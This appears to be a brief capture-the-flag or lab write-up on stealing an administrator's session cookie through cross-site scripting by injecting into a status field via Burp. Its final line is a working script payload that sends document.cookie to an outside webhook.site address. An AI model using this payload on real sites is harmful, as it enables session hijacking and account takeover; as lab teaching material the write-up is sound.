Steal the administrator session’s cookie and go in the admin section.
We use this script: <script>alert(1)</script> to check whether XSS exists or not
ok, it encodes the content of the message field
so let's look at the source code to see if we can bypass this
I don't think I can do this on the message field, but I found something interesting,
which is that it sends the status. So let's take advantage of this and inject our payload into it.
First, we will capture the request to manipulate it using burp
We will use this payload
<script>document.location='<https://webhook.site/0d8fd947-e1b8-41d1-bd48-68e0b672a0f0?cookie='+document.cookie></script>